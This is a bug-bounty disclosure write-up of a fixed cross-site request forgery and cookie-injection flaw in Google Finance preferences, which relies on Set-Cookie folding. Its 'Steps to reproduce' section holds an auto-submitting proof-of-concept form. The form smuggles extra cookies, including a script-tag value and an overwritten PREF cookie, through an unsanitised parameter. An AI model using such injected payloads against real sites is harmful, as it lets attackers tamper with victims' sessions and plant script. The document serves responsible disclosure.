Here I present a (reported and fixed) XSRF and Cookie manipulation vulnerability I discovered in
google.com, requiring no user interaction. It was possible to set arbitrary cookies and tamper with existing ones.
This works on Safari and browsers that support setting multiple cookies within the same
Set-Cookie header, a technique called Set-Cookie folding.
The behavior is specified in section 4.2.2 of RFC 2109.
The RFC says that the
Set-Cookie response header comprises the token
Set-Cookie:, followed by a comma separated list of one or more cookies.
RFC 2109 was obsoleted by RFC 2965, which in turn was obsoleted by RFC 6265. The most recent specification does not formally forbid
Set-Cookie folding, but some browsers (Chrome included) do not support it.
So this exploit works for the rest of them.
The bug is a lack of sanitization of the
prefsval parameter, which is used in the response within a
<PAYLOAD> allows commas and semicolons, thus allowing injection and cookie manipulation for browsers that allow Set-Cookie folding.
A proof-of-concept payload could be:
this sets the first cookie (called
X, terminates it, sets a cookie named
USER_CONTROLLED_COOKIE_NAME with content
<script>alert('XSS')</script> (totally unescaped), terminates it, and sets another cookie
DUMMY with the rest of the original, legitimate
It is also possible to set arbitrary expiration date and path, thus making it valid for
google.com/ and not only
google.com/finance. No anti-XSRF token was used.
Steps to reproduce
- Let the victim, logged in her Google account, visit this crafted HTML page:
<html> <body onload="document.forms.submit()"> <form action="http://www.google.ca/finance/prefs?action=set&prefsgroup=global &prefskey=RV&prefsval=X;,%20USER_CONTROLLED_COOKIE_NAME=<script>alert('XSS')</script>;%20path=/; %20Max-Age=999999999;%20domain=.google.ca;,%20PREF=GOOGLE_COOKIE_CONTENT_CHANGED;%20path=/; %20Max-Age=999999999;%20domain=.google.ca;,DUMMY=" method="post"> <input type="submit" value="Submit"> </form> </body> </html>
- They now has an arbitrary cookie set for
USER_CONTROLLED_COOKIE_NAME), and a Google one (
This vulnerability was fixed in a week. The request now requires an anti-XSRF token and returns
HTTP 400/Bad Request if it is missing.
I received a $3133.7 reward and have been listed in the Google Security Hall of Fame for the fourth time.
Thank you, Google Security Team! :)